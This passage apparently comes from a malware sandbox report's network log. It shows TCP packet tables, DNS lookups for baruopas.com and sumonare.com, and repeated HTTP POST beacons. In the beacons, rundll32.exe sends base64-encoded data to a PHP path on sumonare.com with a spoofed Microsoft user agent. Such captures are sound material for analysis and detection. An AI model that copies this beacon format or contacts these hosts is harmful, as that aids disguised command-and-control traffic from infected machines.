                Sep 28, 2024 03:23:40.521436930 CEST497974433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:40.528650045 CEST443349797194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:40.528794050 CEST497974433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:40.531222105 CEST497974433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:40.536057949 CEST443349797194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:41.369374990 CEST443349797194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:41.371588945 CEST497974433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:41.376811981 CEST443349797194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:41.376883984 CEST497974433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:41.520895004 CEST497984433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:41.525906086 CEST443349798194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:41.526124001 CEST497984433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:41.527412891 CEST497984433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:41.532186031 CEST443349798194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:42.323307991 CEST443349798194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:42.325237036 CEST497984433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:42.330285072 CEST443349798194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:42.330420017 CEST497984433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:42.471611977 CEST497994433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:42.476568937 CEST443349799194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:42.476671934 CEST497994433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:42.478333950 CEST497994433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:42.483371973 CEST443349799194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:43.277096987 CEST443349799194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:43.323345900 CEST497994433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:43.328283072 CEST443349799194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:43.328367949 CEST497994433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:43.545214891 CEST498004433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:43.550081968 CEST443349800194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:43.550168037 CEST498004433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:43.557797909 CEST498004433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:43.562586069 CEST443349800194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:44.360965967 CEST443349800194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:44.362791061 CEST498004433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:44.368020058 CEST443349800194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:44.368091106 CEST498004433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:44.496525049 CEST498014433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:44.501534939 CEST443349801194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:44.501662016 CEST498014433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:44.503117085 CEST498014433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:44.507997036 CEST443349801194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:45.329581976 CEST443349801194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:45.331286907 CEST498014433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:45.336659908 CEST443349801194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:45.336730003 CEST498014433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:45.481158972 CEST498024433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:45.486485004 CEST443349802194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:45.486586094 CEST498024433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:45.488121033 CEST498024433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:45.494513035 CEST443349802194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:46.296605110 CEST443349802194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:46.298259974 CEST498024433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:46.303416014 CEST443349802194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:46.303534031 CEST498024433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:46.437652111 CEST498034433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:46.442533970 CEST443349803194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:46.442625999 CEST498034433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:46.444000959 CEST498034433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:46.448740959 CEST443349803194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:47.275290012 CEST443349803194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:47.276824951 CEST498034433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:47.282099962 CEST443349803194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:47.282152891 CEST498034433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:47.417387009 CEST498044433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:47.422370911 CEST443349804194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:47.422594070 CEST498044433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:47.424736977 CEST498044433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:47.429578066 CEST443349804194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:48.250792980 CEST443349804194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:48.252499104 CEST498044433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:48.257589102 CEST443349804194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:48.257652044 CEST498044433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:48.386192083 CEST498054433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:48.391185999 CEST443349805194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:48.391283035 CEST498054433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:48.392682076 CEST498054433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:48.397568941 CEST443349805194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:49.186009884 CEST443349805194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:49.187570095 CEST498054433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:49.192641020 CEST443349805194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:49.192703962 CEST498054433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:49.324184895 CEST498064433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:49.329065084 CEST443349806194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:49.329179049 CEST498064433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:49.330503941 CEST498064433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:49.335371017 CEST443349806194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:50.165543079 CEST443349806194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:50.167231083 CEST498064433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:50.172440052 CEST443349806194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:50.172489882 CEST498064433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:50.325742006 CEST498074433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:50.330693007 CEST443349807194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:50.330794096 CEST498074433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:50.332117081 CEST498074433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:50.336884022 CEST443349807194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:51.162687063 CEST443349807194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:51.164360046 CEST498074433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:51.169527054 CEST443349807194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:51.169619083 CEST498074433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:51.309505939 CEST498084433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:51.314302921 CEST443349808194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:51.314429998 CEST498084433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:51.315865040 CEST498084433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:51.320754051 CEST443349808194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:52.124708891 CEST443349808194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:52.126740932 CEST498084433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:52.131897926 CEST443349808194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:52.131978035 CEST498084433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:52.261538982 CEST498094433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:52.267688990 CEST443349809194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:52.267805099 CEST498094433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:52.269217014 CEST498094433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:52.273977041 CEST443349809194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:53.262797117 CEST443349809194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:53.264491081 CEST498094433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:53.269654036 CEST443349809194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:53.269745111 CEST498094433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:53.402060032 CEST498104433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:53.406945944 CEST443349810194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:53.407047987 CEST498104433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:53.408438921 CEST498104433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:53.413253069 CEST443349810194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:54.230036020 CEST443349810194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:54.231770039 CEST498104433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:54.236887932 CEST443349810194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:54.236944914 CEST498104433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:54.378622055 CEST498114433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:54.383471012 CEST443349811194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:54.383562088 CEST498114433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:54.385066032 CEST498114433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:54.389807940 CEST443349811194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:55.203732967 CEST443349811194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:55.205209970 CEST498114433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:55.210167885 CEST443349811194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:55.210319042 CEST498114433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:55.342964888 CEST498124433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:55.347856998 CEST443349812194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:55.347970963 CEST498124433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:55.349313974 CEST498124433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:55.354068995 CEST443349812194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:56.158932924 CEST443349812194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:56.161427021 CEST498124433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:56.167936087 CEST443349812194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:56.168035030 CEST498124433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:56.311211109 CEST498134433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:56.316096067 CEST443349813194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:56.316186905 CEST498134433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:56.318146944 CEST498134433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:56.323694944 CEST443349813194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:57.119205952 CEST443349813194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:57.126116991 CEST498134433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:57.132461071 CEST443349813194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:57.132539034 CEST498134433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:57.278670073 CEST498144433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:57.284037113 CEST443349814194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:57.284230947 CEST498144433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:57.286072016 CEST498144433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:57.291207075 CEST443349814194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:58.108185053 CEST443349814194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:58.110615969 CEST498144433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:58.119446039 CEST443349814194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:58.119525909 CEST498144433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:58.243169069 CEST498154433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:58.280932903 CEST443349815194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:58.281140089 CEST498154433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:58.282793999 CEST498154433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:58.291484118 CEST443349815194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:59.102058887 CEST443349815194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:59.103424072 CEST498154433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:59.109064102 CEST443349815194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:59.109124899 CEST498154433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:59.245507956 CEST498164433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:59.250443935 CEST443349816194.67.193.12192.168.2.7
                Sep 28, 2024 03:23:59.250566959 CEST498164433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:59.251980066 CEST498164433192.168.2.7194.67.193.12
                Sep 28, 2024 03:23:59.256813049 CEST443349816194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:00.044238091 CEST443349816194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:00.045922995 CEST498164433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:00.058041096 CEST443349816194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:00.058139086 CEST498164433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:00.188118935 CEST498174433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:00.193231106 CEST443349817194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:00.193427086 CEST498174433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:00.194814920 CEST498174433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:00.199961901 CEST443349817194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:00.995470047 CEST443349817194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:00.997354031 CEST498174433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:01.002357960 CEST443349817194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:01.002408028 CEST498174433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:01.142400026 CEST498184433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:01.147187948 CEST443349818194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:01.147289038 CEST498184433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:01.165055037 CEST498184433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:01.169831038 CEST443349818194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:01.949266911 CEST443349818194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:01.951015949 CEST498184433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:01.956027031 CEST443349818194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:01.956106901 CEST498184433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:02.090044975 CEST498194433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:02.094907999 CEST443349819194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:02.097889900 CEST498194433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:02.099358082 CEST498194433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:02.104341984 CEST443349819194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:02.931400061 CEST443349819194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:02.933923960 CEST498194433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:02.939043999 CEST443349819194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:02.941836119 CEST498194433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:03.084671974 CEST498204433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:03.093832970 CEST443349820194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:03.093960047 CEST498204433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:03.095851898 CEST498204433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:03.100636959 CEST443349820194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:03.893477917 CEST443349820194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:03.895153046 CEST498204433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:03.900300026 CEST443349820194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:03.900356054 CEST498204433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:04.048465967 CEST498214433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:04.053374052 CEST443349821194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:04.053479910 CEST498214433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:04.054858923 CEST498214433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:04.061518908 CEST443349821194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:04.856798887 CEST443349821194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:04.858344078 CEST498214433192.168.2.7194.67.193.12
                Sep 28, 2024 03:24:04.863332033 CEST443349821194.67.193.12192.168.2.7
                Sep 28, 2024 03:24:04.863408089 CEST498214433192.168.2.7194.67.193.12
                TimestampSource PortDest PortSource IPDest IP
                Sep 28, 2024 03:22:05.304991007 CEST6127553192.168.2.71.1.1.1
                Sep 28, 2024 03:22:05.660147905 CEST53612751.1.1.1192.168.2.7
                Sep 28, 2024 03:22:08.074928999 CEST5278553192.168.2.71.1.1.1
                Sep 28, 2024 03:22:08.508914948 CEST53527851.1.1.1192.168.2.7
                Sep 28, 2024 03:22:27.674808025 CEST5793853192.168.2.71.1.1.1
                Sep 28, 2024 03:22:28.162827969 CEST53579381.1.1.1192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Sep 28, 2024 03:22:05.304991007 CEST192.168.2.71.1.1.10x8390Standard query (0)baruopas.comA (IP address)IN (0x0001)false
                Sep 28, 2024 03:22:08.074928999 CEST192.168.2.71.1.1.10x159Standard query (0)sumonare.comA (IP address)IN (0x0001)false
                Sep 28, 2024 03:22:27.674808025 CEST192.168.2.71.1.1.10x2348Standard query (0)sumonare.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Sep 28, 2024 03:22:05.660147905 CEST1.1.1.1192.168.2.70x8390No error (0)baruopas.com194.67.193.13A (IP address)IN (0x0001)false
                Sep 28, 2024 03:22:08.508914948 CEST1.1.1.1192.168.2.70x159No error (0)sumonare.com194.67.193.12A (IP address)IN (0x0001)false
                Sep 28, 2024 03:22:28.162827969 CEST1.1.1.1192.168.2.70x2348No error (0)sumonare.com194.67.193.12A (IP address)IN (0x0001)false
                • baruopas.com
                • sumonare.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749710194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:28.180623055 CEST727OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 521
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 36 54 43 39 42 55 31 4a 46 5a 33 67 79 4d 55 74 68 63 54 68 73 62 47 4d 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 70 6f 61 6d 4e 46 5a 33 67 30 64 6d 70 35 59 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 55 78 5a 55 35 5a 62 47 73 34 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 44 53 48 4a 48 51 33 68 5a 62 55 46 35 5a 79 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 64 70 5a 6a 46 5a 62 45 6b 32 4e 33 63 39 50 53 49 73 49 6c 6c 72 53 6c 63 69 4f 6c 73 69 64 32 64 6d 56 69 4a 64 4c 43 4a 6a 5a 6b 74 59 49 6a 6f 69 64 58 63 39 50 53 49 73 49 6d 68 4f 62 33 5a 4b 62 53 49 36 49 6e 68 6e 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 49 32 55 6e 70 58 55 46 49 35 64 58 4e 70 63 57 49 69 4c 43 4a 7a 64 48 56 5a 49 6a 6f 69 64 44 45 72 51 56 6c 6e 50 54 30 69 4c 43 4a 32 62 [TRUNCATED]
                Data Ascii: data=eyJBbldGaCI6IjB6TC9BU1JFZ3gyMUthcThsbGM9IiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsIkhkVlFwQSI6InpoamNFZ3g0dmp5YyIsIlFGWnlpaVVYWSI6InUxZU5ZbGs4IiwiUmJvdCI6IjJDSHJHQ3hZbUF5ZyIsIlNiWlduWCI6IndpZjFZbEk2N3c9PSIsIllrSlciOlsid2dmViJdLCJjZktYIjoidXc9PSIsImhOb3ZKbSI6InhnPT0iLCJvQnVNVXUiOiI2UnpXUFI5dXNpcWIiLCJzdHVZIjoidDErQVlnPT0iLCJ2b0pjIjoiK1FIek1BPT0iLCJ3QWNIIjoieVFmWE1nYzUrV25lU3MraCIsIndRZVJIIjoidVZxWkVRSisiLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:29.041862965 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:28 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.749711194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:29.277628899 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:30.078321934 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:29 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.749713194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:30.221549988 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:31.054049969 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:30 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.749714194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:31.206305027 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
